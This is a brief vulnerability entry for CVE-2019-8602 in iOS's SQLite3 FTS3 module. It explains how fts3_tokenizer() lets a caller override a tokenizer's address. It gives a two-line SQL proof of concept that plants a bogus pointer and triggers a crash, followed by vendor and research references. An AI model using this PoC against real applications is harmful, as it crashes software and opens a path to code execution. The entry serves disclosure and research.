CVE-2019-8602
Information
Compiled with the virtual table module FTS3, iOS’s SQLite3 exposes the function fts3_tokenizer().
Called with 2 arguments, it is possible to register a new tokenizer, or override an existing tokenizers address.
Crash Dump:
PoC:
SELECT fts3_tokenizer('simple', x'4141414141414141');
CREATE VIRTUAL TABLE vt USING fts3 (content TEXT);
Attachments:
Crash.png
References:
https://support.apple.com/en-us/HT210118
https://support.apple.com/en-us/HT210119
https://research.checkpoint.com/select-code_execution-from-using-sqlite/